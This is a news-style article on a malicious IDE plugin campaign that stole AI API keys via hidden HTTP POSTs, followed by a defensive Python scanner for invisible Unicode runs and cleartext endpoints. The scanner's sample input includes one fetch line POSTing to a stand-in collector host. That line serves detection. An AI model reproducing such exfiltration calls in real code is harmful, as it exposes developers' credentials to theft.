Developers utilizing AI-powered coding tools are facing a significant security threat due to a coordinated malware campaign targeting JetBrains and Visual Studio Code (VS Code) extensions. This campaign involves at least 15 fraudulent plugins designed to steal API keys from AI service providers such as OpenAI, Anthropic, and DeepSeek.
These malicious plugins masquerade as legitimate AI coding assistants, offering functionalities purportedly built on platforms like DeepSeek, OpenAI, and SiliconFlow. However, beneath their seemingly helpful interfaces, they execute credential-theft routines that compromise sensitive developer information.
The attack has been ongoing for approximately eight months, with the earliest instances detected in late October 2025 and new plugins appearing as recently as June 10, 2026. Collectively, these 15 plugins have amassed nearly 70,000 installations across seven vendor accounts, underscoring the extent to which developers trust marketplace ecosystems—a trust that has been exploited by these malicious actors.
Security researchers at Aikido Security were the first to identify and disclose this campaign. Their findings highlight that Integrated Development Environment (IDE) plugin ecosystems have become primary targets for AI credential theft. The lack of robust supply chain integrity controls within these environments has made them vulnerable to such attacks.
In addition to the JetBrains campaign, researchers have identified related threats active during the same period. The GlassWorm malware targeted the VS Code Marketplace and the OpenVSX Registry, while a separate supply chain compromise affected GitHub’s Internal Repository. These incidents reflect a broader trend of attackers focusing on developer tools as high-value entry points for malicious activities.
The financial implications of these attacks are substantial. AI inference services are costly, with enterprise customers paying significant monthly fees for model access. Stolen API keys allow attackers to utilize these services without incurring costs, leaving the legitimate owners to bear the expenses. This situation has led to the emergence of a black market for resold AI access.
All 15 identified malicious plugins share nearly identical codebases, repackaged and relisted under different names and vendor accounts. When developers input their API keys into the plugin settings and apply them, the credentials are stored locally as expected. At the same time, however, the keys are sent in plain HTTP POST requests to attacker-controlled servers, with no notification to the user and no consent.
Further analysis by Aikido Security revealed a monetization strategy within this campaign that distinguishes it from typical credential theft. Some plugins offer paid tiers, and upon payment, the attacker’s server returns a working API key to the client. These returned keys are believed to be stolen from users of the free-tier versions, effectively turning the campaign into a credential resale service where attackers profit both financially and through unauthorized AI compute access.
The GlassWorm malware, first identified by Koi Security in October 2025, exemplifies the technical sophistication of these threats. It spreads through malicious VS Code extensions on the OpenVSX Registry, utilizing techniques such as invisible Unicode characters to conceal malicious code. This method allows the malware to evade detection while compromising developer environments.
These incidents underscore the critical need for developers to exercise caution when installing IDE plugins. It is imperative to verify the authenticity of extensions, regularly audit installed plugins, and stay informed about emerging security threats. Additionally, marketplace operators must implement stricter security measures and supply chain integrity controls to prevent the distribution of malicious extensions and protect the developer community from such sophisticated attacks.
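One way to run the kind of plugin audit recommended above, as an added example that is not code from Aikido Security, Koi Security, or the original article: it scans extension source text for long runs of invisible Unicode characters (the concealment technique attributed to GlassWorm) and for cleartext `http://` endpoints (the channel the plugins used to send keys). The character categories, the run threshold of 8, the function names, and the sample strings are assumptions constructed for illustration.

```python
import re
import unicodedata

# Assumption: "invisible" means format characters (Cf, e.g. zero-width and tag
# characters), private-use code points (Co), or Unicode variation selectors.
def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    if 0xFE00 <= cp <= 0xFE0F or 0xE0100 <= cp <= 0xE01EF:
        return True
    return unicodedata.category(ch) in ("Cf", "Co")

# Cleartext endpoints other than loopback are worth a manual look in any plugin
# that handles API keys.
HTTP_URL = re.compile(r"http://(?!localhost\b|127\.0\.0\.1\b)[^\s\"'<>)]+", re.I)

def audit_source(text: str, min_run: int = 8) -> list[dict]:
    """Return findings (line number, kind, detail) for one source file's text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        run = longest = 0
        for ch in line:
            # A lone selector after an emoji is normal; a long unbroken run is not.
            run = run + 1 if is_invisible(ch) else 0
            longest = max(longest, run)
        if longest >= min_run:
            findings.append({"line": lineno, "kind": "invisible-run", "detail": longest})
        for m in HTTP_URL.finditer(line):
            findings.append({"line": lineno, "kind": "cleartext-http", "detail": m.group(0)})
    return findings

# Constructed sample input; none of these strings come from the real plugins.
SAMPLE = (
    "const label = 'ok\ufe0f';\n"                  # single selector: below threshold
    "const x = '" + "\U000e0100" * 12 + "';\n"      # 12 invisible characters in a row
    "fetch('http://collector.example.invalid/k', {method: 'POST'});\n"
    "fetch('http://localhost:8080/health');\n"      # loopback: ignored
    "fetch('https://api.example.invalid/v1');\n"    # TLS: ignored
)

if __name__ == "__main__":
    for finding in audit_source(SAMPLE):
        print(finding)
```

Both checks are heuristics: a finding is a reason to read the flagged line, and a clean result does not show that a plugin is safe.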